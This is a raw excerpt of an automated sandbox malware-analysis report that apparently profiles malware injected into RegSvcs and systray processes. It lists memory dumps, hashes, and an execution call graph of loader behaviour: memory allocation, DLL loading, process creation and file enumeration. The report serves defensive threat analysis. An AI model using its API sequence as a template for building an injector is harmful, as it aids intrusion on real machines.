• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Bl$l
• API String ID: 3446177414-208461968
• Opcode ID: 7fba8e95d538b4431d531c930cce85b6cc149e587d801d8a3e3298a19a66b10f
• Instruction ID: d154daed2f77eac5826474e95ca7952c18b144297ab7e02d464c252c48e41d64
• Opcode Fuzzy Hash: 7fba8e95d538b4431d531c930cce85b6cc149e587d801d8a3e3298a19a66b10f
• Instruction Fuzzy Hash: 04A1C431A003299BEF35EBA9C880BAAB7F5BB45704F0440EAD50D672D1DB74AE85CF51
APIs
• __startOneArgErrorHandling.LIBCMT ref: 019B5E34
Strings
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: bad333a652b7b5d477c83f180c3ac52f3205b62cbb52d94f32b431059d4c319a
• Instruction ID: 88298a4e1346732aff5aac58f702017cfbbb1db5cabeab56ee502a38c8d31479
• Opcode Fuzzy Hash: bad333a652b7b5d477c83f180c3ac52f3205b62cbb52d94f32b431059d4c319a
• Instruction Fuzzy Hash: 74514971908206A7FB22B61CCBC57FE6B98EB40711F15CD58E0DF862DDEA3484958B46
Strings
Memory Dump Source
• Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
• Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 0$Flst
• API String ID: 0-758220159
• Opcode ID: 9ab623d67385f2514a3171c4a7bc50fb9e35eb659fe5e6ca564f1d0b72e1fd0d
• Instruction ID: 9795926f77e7a921e3df9837c052e4a8c4edf9f4a2eab795cdb407413e1560ea
• Opcode Fuzzy Hash: 9ab623d67385f2514a3171c4a7bc50fb9e35eb659fe5e6ca564f1d0b72e1fd0d
• Instruction Fuzzy Hash: DD515EB1E002158FDF26CF99C584669FBF8FF44715F58806AD14D9B251EBB0A949CBC0
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 0199D959
                                                                    • Part of subcall function 01974859: RtlDebugPrintTimes.NTDLL ref: 019748F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  • API String ID: 3446177414-233714265
                                                                  • Opcode ID: 39d7efbb71797136b53508b94477afc4410bfaf0522aa453a7b5ce2330f2ef45
                                                                  • Instruction ID: fed6de7d2896853cfc373b71c1409bb8de27b6328a3b890caf2c10d29b2a422c
                                                                  • Opcode Fuzzy Hash: 39d7efbb71797136b53508b94477afc4410bfaf0522aa453a7b5ce2330f2ef45
                                                                  • Instruction Fuzzy Hash: 6B51CD75A00246DFDF25EFADC584B9EBBF2BF98304F244059C90D6B292D770A846CB91
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 019FCFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: 5eb518743052aab87e2aa77137dc3d23a0377449175007ec48f92544f21083e7
                                                                  • Instruction ID: 5039b295db67b09387a4b47c02cf91058eb6d00694424a13fb40814b40bdea0e
                                                                  • Opcode Fuzzy Hash: 5eb518743052aab87e2aa77137dc3d23a0377449175007ec48f92544f21083e7
                                                                  • Instruction Fuzzy Hash: 04419E75900219EFDB219FA9C840AADFBF8FF95B00F04442EEA19DB265D734D901CB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $
                                                                  • API String ID: 3446177414-3993045852
                                                                  • Opcode ID: 0e44b45482db60958355c5b96f568a482d036f9d34b21bcd6151694c22d84f20
                                                                  • Instruction ID: d95f8d9c6767c189b6b43483ea12d7d69913a82015529b52550a79ea179c00e6
                                                                  • Opcode Fuzzy Hash: 0e44b45482db60958355c5b96f568a482d036f9d34b21bcd6151694c22d84f20
                                                                  • Instruction Fuzzy Hash: 50418D75A01209ABDF12DF99D884AEEBBF9BF48704F14005AED08A7341D771A951CB90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0$0
                                                                  • API String ID: 3446177414-203156872
                                                                  • Opcode ID: 92a9c7964d2205921a93a7d05a77fcb8cdc45df500125fa54e8fb732917c421f
                                                                  • Instruction ID: 4deeee844319e7fca43c75b6a50838e0763db80be68b14abc740e43b372521a2
                                                                  • Opcode Fuzzy Hash: 92a9c7964d2205921a93a7d05a77fcb8cdc45df500125fa54e8fb732917c421f
                                                                  • Instruction Fuzzy Hash: CE415CB5608706AFD311CF68C584A56BBE8BB8C714F04492EF58CDB341D771E905CBA6

                                                                  Execution Graph

                                                                  Execution Coverage:2.8%
                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:439
                                                                  Total number of Limit Nodes:70
                                                                  execution_graph 90337 abb620 90340 adb650 90337->90340 90339 abcc91 90343 ad9770 90340->90343 90342 adb681 90342->90339 90344 ad9808 90343->90344 90346 ad979e 90343->90346 90345 ad981e NtAllocateVirtualMemory 90344->90345 90345->90342 90346->90342 90347 ab9f20 90350 aba240 90347->90350 90349 aba5fb 90350->90349 90351 adb340 90350->90351 90352 adb366 90351->90352 90357 ab4180 90352->90357 90354 adb372 90356 adb3ab 90354->90356 90360 ad5750 90354->90360 90356->90349 90364 ac3350 90357->90364 90359 ab418d 90359->90354 90361 ad57b2 90360->90361 90363 ad57bf 90361->90363 90388 ac1b20 90361->90388 90363->90356 90365 ac336a 90364->90365 90367 ac3383 90365->90367 90368 ada060 90365->90368 90367->90359 90370 ada07a 90368->90370 90369 ada0a9 90369->90367 90370->90369 90375 ad8c50 90370->90375 90376 ad8c6d 90375->90376 90382 4b12c0a 90376->90382 90377 ad8c99 90379 adb6e0 90377->90379 90385 ad9980 90379->90385 90381 ada122 90381->90367 90383 4b12c11 90382->90383 90384 4b12c1f LdrInitializeThunk 90382->90384 90383->90377 90384->90377 90386 ad999a 90385->90386 90387 ad99ab RtlFreeHeap 90386->90387 90387->90381 90389 ac1b5b 90388->90389 90404 ac7fc0 90389->90404 90391 ac1b63 90402 ac1e46 90391->90402 90415 adb7c0 90391->90415 90393 ac1b79 90394 adb7c0 RtlAllocateHeap 90393->90394 90395 ac1b8a 90394->90395 90396 adb7c0 RtlAllocateHeap 90395->90396 90398 ac1b9b 90396->90398 90403 ac1c35 90398->90403 90429 ac6b60 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 90398->90429 90400 ac1df2 90425 ad8090 90400->90425 90402->90363 90418 ac46a0 90403->90418 90405 ac7fec 90404->90405 90430 ac7eb0 90405->90430 90408 ac8019 90412 ac8024 90408->90412 90436 ad9610 90408->90436 90409 ac8031 90411 ac804d 90409->90411 90413 ad9610 NtClose 90409->90413 90411->90391 90412->90391 90414 ac8043 90413->90414 90414->90391 90444 ad9930 90415->90444 90417 adb7db 90417->90393 90420 ac46c4 90418->90420 90419 ac46cb 90419->90400 
90420->90419 90422 ac46ea 90420->90422 90447 adcb60 LdrLoadDll 90420->90447 90423 ac4717 90422->90423 90424 ac4700 LdrLoadDll 90422->90424 90423->90400 90424->90423 90426 ad80f1 90425->90426 90428 ad80fe 90426->90428 90448 ac1e60 90426->90448 90428->90402 90429->90403 90431 ac7eca 90430->90431 90435 ac7fa6 90430->90435 90439 ad8cf0 90431->90439 90434 ad9610 NtClose 90434->90435 90435->90408 90435->90409 90437 ad962a 90436->90437 90438 ad963b NtClose 90437->90438 90438->90412 90440 ad8d0a 90439->90440 90443 4b135c0 LdrInitializeThunk 90440->90443 90441 ac7f9a 90441->90434 90443->90441 90445 ad994d 90444->90445 90446 ad995e RtlAllocateHeap 90445->90446 90446->90417 90447->90422 90464 ac8290 90448->90464 90450 ac1e80 90457 ac23c7 90450->90457 90468 ad1290 90450->90468 90453 ac209a 90476 adc8b0 90453->90476 90454 ac1ede 90454->90457 90471 adc780 90454->90471 90457->90428 90458 ac20af 90460 ac20f9 90458->90460 90482 ac0970 90458->90482 90460->90457 90462 ac0970 LdrInitializeThunk 90460->90462 90485 ac8230 90460->90485 90461 ac8230 LdrInitializeThunk 90463 ac224a 90461->90463 90462->90460 90463->90460 90463->90461 90465 ac829d 90464->90465 90466 ac82be SetErrorMode 90465->90466 90467 ac82c5 90465->90467 90466->90467 90467->90450 90469 adb650 NtAllocateVirtualMemory 90468->90469 90470 ad12b1 90469->90470 90470->90454 90472 adc796 90471->90472 90473 adc790 90471->90473 90474 adb7c0 RtlAllocateHeap 90472->90474 90473->90453 90475 adc7bc 90474->90475 90475->90453 90477 adc820 90476->90477 90478 adc87d 90477->90478 90479 adb7c0 RtlAllocateHeap 90477->90479 90478->90458 90480 adc85a 90479->90480 90481 adb6e0 RtlFreeHeap 90480->90481 90481->90478 90483 ac0992 90482->90483 90489 ad98a0 90482->90489 90483->90463 90486 ac8243 90485->90486 90494 ad8b50 90486->90494 90488 ac826e 90488->90460 90490 ad98ba 90489->90490 90493 4b12c70 LdrInitializeThunk 90490->90493 90491 ad98e2 90491->90483 90493->90491 90495 ad8bd1 90494->90495 90497 ad8b7e 90494->90497 90499 4b12dd0 
LdrInitializeThunk 90495->90499 90496 ad8bf6 90496->90488 90497->90488 90499->90496 90500 ac23e0 90501 ad8c50 LdrInitializeThunk 90500->90501 90502 ac2416 90501->90502 90505 ad96a0 90502->90505 90504 ac242b 90506 ad9732 90505->90506 90508 ad96ce 90505->90508 90510 4b12e80 LdrInitializeThunk 90506->90510 90507 ad9763 90507->90504 90508->90504 90510->90507 90521 ad9560 90522 ad95da 90521->90522 90524 ad958e 90521->90524 90523 ad95f0 NtDeleteFile 90522->90523 90527 ac28bf 90530 ac6400 90527->90530 90529 ac28dd 90531 ac6433 90530->90531 90532 ac6457 90531->90532 90537 ad9170 90531->90537 90532->90529 90534 ac647a 90534->90532 90535 ad9610 NtClose 90534->90535 90536 ac64fa 90535->90536 90536->90529 90538 ad918d 90537->90538 90541 4b12ca0 LdrInitializeThunk 90538->90541 90539 ad91b9 90539->90534 90541->90539 90542 ac7270 90543 ac728c 90542->90543 90545 ac72df 90542->90545 90543->90545 90546 ad9610 NtClose 90543->90546 90544 ac7417 90545->90544 90553 ac6690 NtClose LdrInitializeThunk LdrInitializeThunk 90545->90553 90547 ac72a7 90546->90547 90552 ac6690 NtClose LdrInitializeThunk LdrInitializeThunk 90547->90552 90549 ac73f1 90549->90544 90554 ac6860 NtClose LdrInitializeThunk LdrInitializeThunk 90549->90554 90552->90545 90553->90549 90554->90544 90555 acc730 90556 acc759 90555->90556 90557 acc85d 90556->90557 90558 acc803 FindFirstFileW 90556->90558 90558->90557 90561 acc81e 90558->90561 90559 acc844 FindNextFileW 90560 acc856 FindClose 90559->90560 90559->90561 90560->90557 90561->90559 90562 acf970 90563 acf9d4 90562->90563 90564 ac6400 2 API calls 90563->90564 90566 acfb07 90564->90566 90565 acfb0e 90566->90565 90591 ac6510 90566->90591 90568 acfcb3 90569 acfb8a 90569->90568 90570 acfcc2 90569->90570 90595 acf750 90569->90595 90572 ad9610 NtClose 90570->90572 90574 acfccc 90572->90574 90573 acfbc6 90573->90570 90575 acfbd1 90573->90575 90576 adb7c0 RtlAllocateHeap 90575->90576 90577 acfbfa 90576->90577 90578 acfc19 90577->90578 90579 acfc03 90577->90579 90604 acf640 
CoInitialize 90578->90604 90580 ad9610 NtClose 90579->90580 90582 acfc0d 90580->90582 90583 acfc27 90607 ad90d0 90583->90607 90585 acfca2 90586 ad9610 NtClose 90585->90586 90587 acfcac 90586->90587 90589 adb6e0 RtlFreeHeap 90587->90589 90588 acfc45 90588->90585 90590 ad90d0 LdrInitializeThunk 90588->90590 90589->90568 90590->90588 90592 ac6535 90591->90592 90611 ad8f70 90592->90611 90596 acf76c 90595->90596 90597 ac46a0 2 API calls 90596->90597 90599 acf78a 90597->90599 90598 acf793 90598->90573 90599->90598 90600 ac46a0 2 API calls 90599->90600 90601 acf85e 90600->90601 90602 ac46a0 2 API calls 90601->90602 90603 acf8bb 90601->90603 90602->90603 90603->90573 90606 acf6a5 90604->90606 90605 acf73b CoUninitialize 90605->90583 90606->90605 90608 ad90ea 90607->90608 90616 4b12ba0 LdrInitializeThunk 90608->90616 90609 ad911a 90609->90588 90612 ad8f8a 90611->90612 90615 4b12c60 LdrInitializeThunk 90612->90615 90613 ac65a9 90613->90569 90615->90613 90616->90609 90617 ad0270 90618 ad028d 90617->90618 90619 ac46a0 2 API calls 90618->90619 90620 ad02ab 90619->90620 90621 ad9470 90622 ad9517 90621->90622 90624 ad949b 90621->90624 90623 ad952d NtReadFile 90622->90623 90625 4b12ad0 LdrInitializeThunk 90626 ac0f4b PostThreadMessageW 90627 ac0f5d 90626->90627 90628 ab9ec0 90630 ab9ecf 90628->90630 90629 ab9f10 90630->90629 90631 ab9efd CreateThread 90630->90631 90632 ad8a80 90633 ad8b0f 90632->90633 90635 ad8aab 90632->90635 90637 4b12ee0 LdrInitializeThunk 90633->90637 90634 ad8b40 90637->90634 90638 ad18c0 90639 ad18dc 90638->90639 90640 ad1918 90639->90640 90641 ad1904 90639->90641 90643 ad9610 NtClose 90640->90643 90642 ad9610 NtClose 90641->90642 90644 ad190d 90642->90644 90645 ad1921 90643->90645 90648 adb800 RtlAllocateHeap 90645->90648 90647 ad192c 90648->90647 90649 ad8c00 90650 ad8c1d 90649->90650 90653 4b12df0 LdrInitializeThunk 90650->90653 90651 ad8c45 90653->90651 90654 ad61c0 90655 ad621a 90654->90655 90657 ad6227 90655->90657 90658 ad3be0 90655->90658 90659 
ad3be7 90658->90659 90660 adb650 NtAllocateVirtualMemory 90659->90660 90662 ad3c21 90660->90662 90661 ad3d2e 90661->90657 90662->90661 90663 ac46a0 2 API calls 90662->90663 90665 ad3c67 90663->90665 90664 ad3cb0 Sleep 90664->90665 90665->90661 90665->90664 90667 ad6120 LdrLoadDll LdrLoadDll Sleep NtAllocateVirtualMemory 90665->90667 90667->90665 90668 ad9300 90669 ad93ba 90668->90669 90671 ad9332 90668->90671 90670 ad93d0 NtCreateFile 90669->90670 90672 acfcd8 90673 acfc9d 90672->90673 90676 acfcdc 90672->90676 90674 acfcac 90673->90674 90675 ad9610 NtClose 90673->90675 90677 adb6e0 RtlFreeHeap 90674->90677 90675->90674 90678 acfcb3 90677->90678 90679 ac8957 90680 ac895a 90679->90680 90681 ac8911 90680->90681 90683 ac71f0 90680->90683 90684 ac7206 90683->90684 90686 ac723f 90683->90686 90684->90686 90687 ac7060 LdrLoadDll LdrLoadDll 90684->90687 90686->90681 90687->90686 90688 acae90 90693 acaba0 90688->90693 90690 acae9d 90707 aca810 90690->90707 90692 acaeb9 90694 acabc5 90693->90694 90718 ac84a0 90694->90718 90697 acad10 90697->90690 90699 acad27 90699->90690 90700 acad1e 90700->90699 90702 acae15 90700->90702 90737 aca260 90700->90737 90704 acae7a 90702->90704 90746 aca5d0 90702->90746 90705 adb6e0 RtlFreeHeap 90704->90705 90706 acae81 90705->90706 90706->90690 90708 aca826 90707->90708 90715 aca831 90707->90715 90709 adb7c0 RtlAllocateHeap 90708->90709 90709->90715 90710 aca852 90710->90692 90711 ac84a0 GetFileAttributesW 90711->90715 90712 acab75 90713 acab8e 90712->90713 90714 adb6e0 RtlFreeHeap 90712->90714 90713->90692 90714->90713 90715->90710 90715->90711 90715->90712 90716 aca260 RtlFreeHeap 90715->90716 90717 aca5d0 RtlFreeHeap 90715->90717 90716->90715 90717->90715 90719 ac84c1 90718->90719 90720 ac84d3 90719->90720 90721 ac84c8 GetFileAttributesW 90719->90721 90720->90697 90722 ad34a0 90720->90722 90721->90720 90723 ad34ae 90722->90723 90724 ad34b5 90722->90724 90723->90700 90725 ac46a0 2 API calls 90724->90725 90726 ad34ea 90725->90726 90727 ad34f9 
90726->90727 90750 ad2f60 LdrLoadDll LdrLoadDll 90726->90750 90729 adb7c0 RtlAllocateHeap 90727->90729 90733 ad36a7 90727->90733 90730 ad3512 90729->90730 90731 ad369d 90730->90731 90730->90733 90734 ad352e 90730->90734 90732 adb6e0 RtlFreeHeap 90731->90732 90731->90733 90732->90733 90733->90700 90734->90733 90735 adb6e0 RtlFreeHeap 90734->90735 90736 ad3691 90735->90736 90736->90700 90738 aca286 90737->90738 90751 acdca0 90738->90751 90740 aca2fb 90742 aca480 90740->90742 90743 aca319 90740->90743 90741 aca465 90741->90700 90742->90741 90744 aca120 RtlFreeHeap 90742->90744 90743->90741 90756 aca120 90743->90756 90744->90742 90747 aca5f6 90746->90747 90748 acdca0 RtlFreeHeap 90747->90748 90749 aca67d 90748->90749 90749->90702 90750->90727 90753 acdcc4 90751->90753 90752 acdccd 90752->90740 90753->90752 90754 adb6e0 RtlFreeHeap 90753->90754 90755 acdd10 90754->90755 90755->90740 90757 aca13d 90756->90757 90760 acdd20 90757->90760 90759 aca243 90759->90743 90761 acdd44 90760->90761 90761->90761 90762 acddee 90761->90762 90763 adb6e0 RtlFreeHeap 90761->90763 90762->90759 90763->90762 90764 ac6ed0 90765 ac6efa 90764->90765 90768 ac8060 90765->90768 90767 ac6f24 90769 ac807d 90768->90769 90775 ad8d40 90769->90775 90771 ac80cd 90772 ac80d4 90771->90772 90780 ad8e20 90771->90780 90772->90767 90774 ac80fd 90774->90767 90776 ad8dde 90775->90776 90777 ad8d6e 90775->90777 90785 4b12f30 LdrInitializeThunk 90776->90785 90777->90771 90778 ad8e17 90778->90771 90781 ad8ed4 90780->90781 90782 ad8e52 90780->90782 90786 4b12d10 LdrInitializeThunk 90781->90786 90782->90774 90783 ad8f19 90783->90774 90785->90778 90786->90783 90787 ac7450 90788 ac7468 90787->90788 90790 ac74c2 90787->90790 90788->90790 90791 acb3c0 90788->90791 90792 acb3e6 90791->90792 90793 acb619 90792->90793 90818 ad9a10 90792->90818 90793->90790 90795 acb462 90795->90793 90796 adc8b0 2 API calls 90795->90796 90797 acb481 90796->90797 90797->90793 90798 acb555 90797->90798 90800 ad8c50 LdrInitializeThunk 
90797->90800 90799 acb571 90798->90799 90801 ac5c90 LdrInitializeThunk 90798->90801 90807 acb601 90799->90807 90824 ad87c0 90799->90824 90802 acb4e3 90800->90802 90801->90799 90802->90798 90803 acb4ec 90802->90803 90803->90793 90804 acb53d 90803->90804 90805 acb51b 90803->90805 90821 ac5c90 90803->90821 90806 ac8230 LdrInitializeThunk 90804->90806 90839 ad48e0 LdrInitializeThunk 90805->90839 90811 acb54b 90806->90811 90809 ac8230 LdrInitializeThunk 90807->90809 90813 acb60f 90809->90813 90811->90790 90813->90790 90814 acb5d8 90829 ad8870 90814->90829 90816 acb5f2 90834 ad89d0 90816->90834 90819 ad9a2d 90818->90819 90820 ad9a3e CreateProcessInternalW 90819->90820 90820->90795 90822 ad8e20 LdrInitializeThunk 90821->90822 90823 ac5cce 90821->90823 90822->90823 90823->90805 90825 ad883d 90824->90825 90827 ad87eb 90824->90827 90840 4b139b0 LdrInitializeThunk 90825->90840 90826 ad8862 90826->90814 90827->90814 90830 ad889e 90829->90830 90831 ad88f0 90829->90831 90830->90816 90841 4b14340 LdrInitializeThunk 90831->90841 90832 ad8915 90832->90816 90835 ad8a4d 90834->90835 90836 ad89fb 90834->90836 90842 4b12fb0 LdrInitializeThunk 90835->90842 90836->90807 90837 ad8a72 90837->90807 90839->90804 90840->90826 90841->90832 90842->90837 90843 ac5d10 90844 ac8230 LdrInitializeThunk 90843->90844 90846 ac5d40 90844->90846 90847 ac5d6c 90846->90847 90848 ac81b0 90846->90848 90849 ac81f4 90848->90849 90854 ac8215 90849->90854 90855 ad8920 90849->90855 90851 ac8205 90852 ac8221 90851->90852 90853 ad9610 NtClose 90851->90853 90852->90846 90853->90854 90854->90846 90856 ad899d 90855->90856 90858 ad894b 90855->90858 90860 4b14650 LdrInitializeThunk 90856->90860 90857 ad89c2 90857->90851 90858->90851 90860->90857 90866 ad1c50 90871 ad1c69 90866->90871 90867 ad1cfc 90868 ad1cb4 90869 adb6e0 RtlFreeHeap 90868->90869 90870 ad1cc4 90869->90870 90871->90867 90871->90868 90872 ad1cf7 90871->90872 90873 adb6e0 RtlFreeHeap 90872->90873 90873->90867 90874 ac9d52 90875 ac9d5f 90874->90875 90876 
adb6e0 RtlFreeHeap 90875->90876 90877 ac9d66 90875->90877 90876->90877 90878 ac3253 90879 ac7eb0 2 API calls 90878->90879 90880 ac3263 90879->90880 90881 ad9610 NtClose 90880->90881 90882 ac327f 90880->90882 90881->90882
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ACC814
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00ACC84F
                                                                  • FindClose.KERNELBASE(?), ref: 00ACC85A
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: 3cd3e2681ba5a6a1b2d0cb57347a97e780a442727f0ef72e6805e2d903ca3fa1
                                                                  • Instruction ID: 0f158a9724f3c49563f52a0bfba2252b6c3584edd1555eadabc88d1843f35468
                                                                  • Opcode Fuzzy Hash: 3cd3e2681ba5a6a1b2d0cb57347a97e780a442727f0ef72e6805e2d903ca3fa1
                                                                  • Instruction Fuzzy Hash: 3A314375940208BBDB20DFA4CD86FFF777C9F44754F14449DF909A6181EA70AA858BA0
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(?,?,A8038694,?,?,?,?,?,?,?,?), ref: 00AD9401
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: b959064142a78cb0671518204ab95d05372e63b6ea5b1fd54e98333cacff2101
                                                                  • Instruction ID: e84ddcf8c9869a210fc89d2659ba18e969906f002056033c311439fab26459ad
                                                                  • Opcode Fuzzy Hash: b959064142a78cb0671518204ab95d05372e63b6ea5b1fd54e98333cacff2101
                                                                  • Instruction Fuzzy Hash: 8731E2B5A01648AFDB14DF98D981EEFB7F9EF88304F108219F919A7340D730A951CBA0
                                                                  APIs
                                                                  • NtReadFile.NTDLL(?,?,A8038694,?,?,?,?,?,?), ref: 00AD9556
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 05858e37e9e395ee33a9100e9f77f8ce24fca5febf1eff79fb2164b31e51fba1
                                                                  • Instruction ID: 33990582318bf813b878d63e444a60116339151cb48f760f7b7995c956570484
